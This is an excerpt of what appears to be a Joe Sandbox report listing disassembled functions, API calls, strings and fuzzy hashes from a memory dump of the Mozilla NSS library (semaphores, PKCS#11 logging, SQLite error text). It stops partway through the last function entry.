API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 7166317e651b01d27978ffe12c9baeb3d3904929d766402751c23923f430fc44
Instruction ID: 403f3e6000bc385fddc7b1cde79d32a28fcf484fe670a260178754c8b0a528ce
Opcode Fuzzy Hash: 7166317e651b01d27978ffe12c9baeb3d3904929d766402751c23923f430fc44
Instruction Fuzzy Hash: 1351E2B1A042009BE710CF28DE49B96B7E8EF94358F048939EC55C7741E735E949CBD2

Function 6C814960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C818061,?,?,?,?), ref: 6C81497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C81499E
GetLastError.KERNEL32(?,?,6C818061,?,?,?,?), ref: 6C8149AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C818061,?,?,?,?), ref: 6C8149C2

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C818061,?,?,?,?), ref: 6C8149D6
CreateSemaphoreA.KERNEL32(00000000,6C818061,7FFFFFFF,?), ref: 6C814A19
GetLastError.KERNEL32(?,?,?,?,6C818061,?,?,?,?), ref: 6C814A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C818061,?,?,?,?), ref: 6C814A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C818061,?,?,?,?), ref: 6C814A52
GetLastError.KERNEL32(?,?,?,?,6C818061,?,?,?,?), ref: 6C814A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C818061,?,?,?,?), ref: 6C814A6A
CreateSemaphoreA.KERNEL32(?,6C818061,7FFFFFFF,?), ref: 6C814A9A
free.MOZGLUE(?,?,?,?,?,6C818061,?,?,?,?), ref: 6C814AAE
free.MOZGLUE(?,?,?,?,?,6C818061,?,?,?,?), ref: 6C814AC2

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 1a348bc1fdc0989a19d4b05d5d43900e81eac950f2538246b9a90bcc3229b58d
Instruction ID: 0bdcd2fb6f461be05cde479e4aa15e3dfd63463b8fb4c252ab9677190f4dde9b
Opcode Fuzzy Hash: 1a348bc1fdc0989a19d4b05d5d43900e81eac950f2538246b9a90bcc3229b58d
Instruction Fuzzy Hash: 81412B74B042069FDB60AFA8DD48B8A37F4ABC935DF540534F809E3B41D7759804CBA5

Function 6C81C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C81C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C81C8DA
malloc.MOZGLUE(00000001), ref: 6C81C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C81C8F8
PR_NewLock.NSS3 ref: 6C81C909
PR_NewCondVar.NSS3(00000000), ref: 6C81C918
PR_NewCondVar.NSS3(00000000), ref: 6C81C92A

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

free.MOZGLUE(00000000), ref: 6C81C947

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: c85ebe62441942861a1e1ce9d7928e5d48e92a241aec70a3fc213cb2d8f73c6c
Instruction ID: a8d1e84c355fe6031ce5b0408f8940b4c97246877c3a2363411aefa0a2249678
Opcode Fuzzy Hash: c85ebe62441942861a1e1ce9d7928e5d48e92a241aec70a3fc213cb2d8f73c6c
Instruction Fuzzy Hash: 7721D6F1A043079BEB606F799D0965B3AF8AF05258F040835E85AC2E02EB74E514CBE6

Function 6C6FAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C6FAF47

Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F

FreeLibrary.KERNEL32(?), ref: 6C6FAF6D
free.MOZGLUE(?), ref: 6C6FAFA4
free.MOZGLUE(?), ref: 6C6FAFAA
PR_ExitMonitor.NSS3 ref: 6C6FAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C6FAFF5
PR_ExitMonitor.NSS3 ref: 6C6FB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6FB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C6FB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6FB03C

Strings

%s decr => %d, xrefs: 6C6FAFF0
Unloaded library %s, xrefs: 6C6FB023

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: d952c43b8a6285b07051f157dff3dd4c4dcdb606368f244b176a28f9b29d818b
Instruction ID: adcf5e4b99b3e68ab300051dc728c446b2dc3a2329acdd57f7026f59933614b1
Opcode Fuzzy Hash: d952c43b8a6285b07051f157dff3dd4c4dcdb606368f244b176a28f9b29d818b
Instruction Fuzzy Hash: 71314BB4B05011AFEB119F65DC44A55B776EB0531CB184135EC258BB02F332E82AC7F6

Function 6C746C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C74781D,00000000,6C73BE2C,?,6C746B1D,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C74781D,?,6C73BE2C,?), ref: 6C746C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C746C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C746C96

Part of subcall function 6C6F1240: TlsGetValue.KERNEL32(00000040,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1267
Part of subcall function 6C6F1240: EnterCriticalSection.KERNEL32(?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F127C
Part of subcall function 6C6F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1291
Part of subcall function 6C6F1240: PR_Unlock.NSS3(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C746CAA

Strings

extern:, xrefs: 6C746C7E
rdb:, xrefs: 6C746C69
dbm:, xrefs: 6C746C3A
NSS_DEFAULT_DB_TYPE, xrefs: 6C746C91
dbm, xrefs: 6C746CA4
sql:, xrefs: 6C746C52

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 84b2917be4ffacaea9436494f41bd28f884138ed1d235f1cdfefac691080bf3b
Instruction ID: 8ebe95bf0ff7fd2ca86c7e9179bfbc79ee6dbf489be15518fd368867161c1d61
Opcode Fuzzy Hash: 84b2917be4ffacaea9436494f41bd28f884138ed1d235f1cdfefac691080bf3b
Instruction Fuzzy Hash: BD01A7E170231527F56027796F49F26395D9F4265CF544832FE08E0A42EAD6E614C0A5

Function 6C788910 Relevance: 19.8, APIs: 13, Instructions: 304threadmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77A9D0: PR_SetError.NSS3(00000000,00000000), ref: 6C77AA14

PR_GetCurrentThread.NSS3 ref: 6C788A52
PR_SetError.NSS3(FFFFD01F,00000000), ref: 6C788A92
PORT_Alloc_Util.NSS3(?), ref: 6C788B3B
memcpy.VCRUNTIME140(?,?,?), ref: 6C788B90
free.MOZGLUE(?), ref: 6C788BB6
PR_GetCurrentThread.NSS3 ref: 6C788BC7
PR_GetCurrentThread.NSS3 ref: 6C788C28
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C788C57
PORT_NewArena_Util.NSS3(00000800), ref: 6C788C75
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C788C89
memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C788CA2
PR_GetCurrentThread.NSS3 ref: 6C788CC5
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C788CF6

Part of subcall function 6C77AB00: PR_SetError.NSS3(00000000,00000000,?,?,?), ref: 6C77AB5F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CurrentErrorThreadUtil$Alloc_Arena_$ArenaFreefreememcpymemset
String ID:
API String ID: 3570957031-0
Opcode ID: 77e9f2a8c9a99b82401813c9198c74e59eeecb4c880656ce84cb227999658e3b
Instruction ID: ae962b75a004878225052be77cf90a38866c70d9706f3cf7c199ed4dc88e03e7
Opcode Fuzzy Hash: 77e9f2a8c9a99b82401813c9198c74e59eeecb4c880656ce84cb227999658e3b
Instruction Fuzzy Hash: 7FB1B5B1506305AFE710CF24CE44BAA77E8FF84748F04457AFA498B692E735D948C7A2

Function 6C754E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7178F8), ref: 6C754E6D

Part of subcall function 6C6F09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6F06A2,00000000,?), ref: 6C6F09F8
Part of subcall function 6C6F09E0: malloc.MOZGLUE(0000001F), ref: 6C6F0A18
Part of subcall function 6C6F09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6F0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7178F8), ref: 6C754ED9

Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C747703,?,00000000,00000000), ref: 6C745942
Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C747703), ref: 6C745954
Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C74596A
Part of subcall function 6C745920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C745984
Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C745999
Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C7459BA
Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7459D3
Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C7459F5
Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C745A0A
Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C745A2E
Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C745A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754EB3

Part of subcall function 6C754820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75484C
Part of subcall function 6C754820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75486D
Part of subcall function 6C754820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C754EB8,?), ref: 6C754884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754EC0

Part of subcall function 6C754470: TlsGetValue.KERNEL32(00000000,?,6C717296,00000000), ref: 6C754487
Part of subcall function 6C754470: EnterCriticalSection.KERNEL32(?,?,?,6C717296,00000000), ref: 6C7544A0
Part of subcall function 6C754470: PR_Unlock.NSS3(?,?,?,?,6C717296,00000000), ref: 6C7544BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F8F
PK11_UpdateSlotAttribute.NSS3(?,6C82DCB0,00000000), ref: 6C754FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C75501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75506B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 32299633f8eca085c42be54b2f198a190b0da80752dc318c7e0f56f60de401be
Instruction ID: 85ffb86e4a8d079149e3bdb1c2bc5c482a3bcc74e992cf13c40ee0c7c6fd9928
Opcode Fuzzy Hash: 32299633f8eca085c42be54b2f198a190b0da80752dc318c7e0f56f60de401be
Instruction Fuzzy Hash: F051D3B1E002019BDB119F35EE09AAB36B5BF0535CF584635E80A46A52FF32E535CBD2

Function 6C6FACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FACE2
malloc.MOZGLUE(00000001), ref: 6C6FACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6FAD02
TlsGetValue.KERNEL32 ref: 6C6FAD3C
calloc.MOZGLUE(00000001,?), ref: 6C6FAD8C
PR_Unlock.NSS3 ref: 6C6FADC0
free.MOZGLUE(00000000), ref: 6C6FAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6FAE58
free.MOZGLUE(00000000), ref: 6C6FAE69
free.MOZGLUE(?), ref: 6C6FAE78
PR_Unlock.NSS3 ref: 6C6FAE8C
free.MOZGLUE(?), ref: 6C6FAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6FAEC7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: ec12590d8857c3432f1921ab0a830840ffaec7084f27c893294b58596e71221e
Instruction ID: 9819b64d86a8ccad6c030d9dbe26925988d460203aa6c84b39096e2a22ce1e44
Opcode Fuzzy Hash: ec12590d8857c3432f1921ab0a830840ffaec7084f27c893294b58596e71221e
Instruction Fuzzy Hash: 5851C3B4E002168BDB10DF99D8466AE77B6BB0A34CF140135D825A3B13D371AD06CBEA

Function 6C73ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C73ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AE29

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C73AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C73AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C73AEA0

Strings

C_MessageSignInit, xrefs: 6C73ADE1
hSession = 0x%x, xrefs: 6C73AE01, 6C73AE11
(CK_INVALID_HANDLE), xrefs: 6C73AE1F, 6C73AE80
hKey = 0x%x, xrefs: 6C73AE62, 6C73AE72

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: a8bfbb1d8e2a04388e18069fa9c2519939b8a7efa823ad7ca2ed6462dfece388
Instruction ID: 27491b4ca3e66077a58e7e862756750522e8ec67d36226ee5658cbc8424217ee
Opcode Fuzzy Hash: a8bfbb1d8e2a04388e18069fa9c2519939b8a7efa823ad7ca2ed6462dfece388
Instruction Fuzzy Hash: 36312531605124ABCF21CB64DE4EFBA33B9AB4231DF446835E40D5BB42D738A848CBD6

Function 6C7D4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C7D4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4CFD
sqlite3_value_text16.NSS3(?), ref: 6C7D4D44

Strings

bad parameter or other API misuse, xrefs: 6C7D4D05
no more rows available, xrefs: 6C7D4D2E
API call with %s database connection pointer, xrefs: 6C7D4CF6
abort due to ROLLBACK, xrefs: 6C7D4D27, 6C7D4D33
unknown error, xrefs: 6C7D4D56
another row available, xrefs: 6C7D4D20
out of memory, xrefs: 6C7D4C78, 6C7D4C9E
invalid, xrefs: 6C7D4CF1

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: ef55f2b59338cbcdaf2c25fefae10570a3324d18bbe533ab07a05847be0ca237
Instruction ID: df5ef18c8c049368fcddab6ae664d2eaa2ba45aa3f2aa92fc59736dad66dd660
Opcode Fuzzy Hash: ef55f2b59338cbcdaf2c25fefae10570a3324d18bbe533ab07a05847be0ca237
Instruction Fuzzy Hash: E8316873A088216BDB244B24FB067A573617783318F570935D52C4BF65C724BC15E3D6

Function 6C732DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C732DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C732E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C732E33

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C732E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C732E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C732E81

Strings

C_InitPIN, xrefs: 6C732DF1
hSession = 0x%x, xrefs: 6C732E0E, 6C732E1E
(CK_INVALID_HANDLE), xrefs: 6C732E2C
pPin = 0x%p, xrefs: 6C732E63
ulPinLen = %d, xrefs: 6C732E7C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 9103849e3bb6cba8b148d89026c72c6b5954dc35cc73ee448d1eddaae3fd1de3
Instruction ID: 830e22771b79104f700b281a2ffbe3a03f0e05c1e49b5e5ee53d48d9b64de1b3
Opcode Fuzzy Hash: 9103849e3bb6cba8b148d89026c72c6b5954dc35cc73ee448d1eddaae3fd1de3
Instruction Fuzzy Hash: 8A313771606164ABDB20CB15CF4DB6A37B9EB4231CF045470E80DABB53DB38A848CBD6

Function 6C736EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C736F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C736F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C736F53

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C736F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C736F88
